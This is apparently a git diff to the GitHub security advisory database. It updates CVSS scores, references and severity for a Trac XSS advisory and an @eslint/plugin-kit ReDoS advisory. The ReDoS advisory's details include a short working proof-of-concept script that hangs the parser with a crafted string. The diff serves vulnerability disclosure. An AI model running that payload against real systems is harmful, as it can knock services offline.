diff --git a/advisories/github-reviewed/2022/05/GHSA-6vhp-hp77-6w52/GHSA-6vhp-hp77-6w52.json b/advisories/github-reviewed/2022/05/GHSA-6vhp-hp77-6w52/GHSA-6vhp-hp77-6w52.json index 4c57c2bdcd1..e37c2a5df7a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-6vhp-hp77-6w52/GHSA-6vhp-hp77-6w52.json +++ b/advisories/github-reviewed/2022/05/GHSA-6vhp-hp77-6w52/GHSA-6vhp-hp77-6w52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6vhp-hp77-6w52", - "modified": "2024-04-29T14:29:37Z", + "modified": "2024-11-18T20:49:45Z", "published": "2022-05-01T02:29:20Z", "aliases": [ "CVE-2005-4644" @@ -9,7 +9,14 @@ "summary": "Trac HTML WikiProcessor cross-site scripting (XSS) vulnerability", "details": "Cross-site scripting (XSS) vulnerability in the HTML WikiProcessor in Edgewall Trac 0.9.2 allows remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of an IMG tag.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" + } ], "affected": [ { @@ -41,6 +48,10 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24183" }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/trac/PYSEC-2005-1.yaml" + }, { "type": "WEB", "url": "https://web.archive.org/web/20140722192945/http://secunia.com/advisories/18465" diff --git a/advisories/github-reviewed/2024/11/GHSA-7q7g-4xm8-89cq/GHSA-7q7g-4xm8-89cq.json b/advisories/github-reviewed/2024/11/GHSA-7q7g-4xm8-89cq/GHSA-7q7g-4xm8-89cq.json index f7fc1d8d3a7..19749e522bc 100644 --- a/advisories/github-reviewed/2024/11/GHSA-7q7g-4xm8-89cq/GHSA-7q7g-4xm8-89cq.json +++ b/advisories/github-reviewed/2024/11/GHSA-7q7g-4xm8-89cq/GHSA-7q7g-4xm8-89cq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7q7g-4xm8-89cq", - "modified": "2024-11-15T20:47:31Z", + "modified": "2024-11-18T20:49:16Z", "published": "2024-11-15T20:47:31Z", "aliases": [ "CVE-2024-21539" @@ -9,7 +9,10 @@ "summary": "Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit", "details": "Crafting a very large and well crafted string can increase the CPU usage and crash the program.\n\n## POC\n\n```js\nconst { ConfigCommentParser } = require(\"@eslint/plugin-kit\");\n\nvar str = \"\";\nfor (var i = 0; i < 1000000; i++) {\n str += \" \";\n}\nstr += \"A\";\n\nconsole.log(\"start\")\nvar parser = new ConfigCommentParser();\nconsole.log(parser.parseStringConfig(str, \"\"));\nconsole.log(\"end\")\n\n// run `npm i @eslint/plugin-kit` and `node attack.js` \n// then the program will stuck forever with high CPU usage\n```", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L" + } ], "affected": [ { @@ -50,7 +53,7 @@ "cwe_ids": [ "CWE-1333" ], - "severity": "HIGH", + "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2024-11-15T20:47:31Z", "nvd_published_at": null